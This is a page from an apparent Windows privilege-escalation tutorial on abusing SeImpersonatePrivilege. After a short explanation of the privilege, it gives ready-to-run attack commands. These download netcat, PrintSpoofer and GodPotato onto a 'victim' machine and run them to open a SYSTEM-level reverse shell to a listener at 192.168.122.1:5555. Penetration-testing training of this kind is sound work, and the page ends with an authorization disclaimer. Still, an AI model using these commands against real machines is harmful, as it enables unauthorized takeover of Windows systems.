4 - SeImpersonatePrivilege Exploitation
Topics
Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass
What is SeImpersonatePrivilege?
The SeImpersonatePrivilege
, or "Impersonate a client after authentication," is a user right in Windows that allows programs running on behalf of a user to impersonate another client.
This privilege is primarily used in client-server scenarios, enabling a server process to impersonate the client process to perform tasks on its behalf.
Security Implications
If an attacker has the SeImpersonatePrivilege
, they can:
Create a service to trick clients into connecting to it.
Impersonate the connected client’s privileges, potentially escalating their own access to SYSTEM. This makes
SeImpersonatePrivilege
a common target in privilege escalation attacks.
Checking for SeImpersonatePrivilege
To verify whether the current user has this privilege, run the following:
whoami /priv
Sample Output
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeImpersonatePrivilege Impersonate a client after authentication Enabled
If the SeImpersonatePrivilege
is enabled, the user can exploit it for privilege escalation using tools like PrintSpoofer or GodPotato.
Assigning SeImpersonatePrivilege
If you want to assign the SeImpersonatePrivilege
to a user:
Open the Local Group Policy Editor:
Navigate to:
Computer Configuration > Windows Settings > Security Settings > Local Policies > User Rights Assignment
.Locate "Impersonate a client after authentication."
Right-click and select Properties, then click Add User or Group.
Privilege Escalation with SeImpersonatePrivilege
Initial Setup
Start a Listener on the Attacker Machine
nc -lvnp 5555
Download Netcat on the Victim Machine
iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe
Exploiting with PrintSpoofer
PrintSpoofer leverages misconfigured print spooler services to escalate privileges to SYSTEM.
Download the Exploit
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
Execute the Exploit Run the following command to establish a SYSTEM shell:
PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
Exploiting with GodPotato
GodPotato is a tool that exploits COM and DCOM misconfigurations to achieve SYSTEM privileges.
Identify .NET Framework Version Use the following command to determine the .NET version installed:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
Download the Appropriate GodPotato Version Depending on the .NET version:
.NET 2.0:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.NET 3.5:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe
.NET 4.0:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe
Execute the Exploit Use the appropriate executable to escalate privileges and spawn a reverse shell:
.\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
Other Resources
Disclaimer
❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!❗
Last updated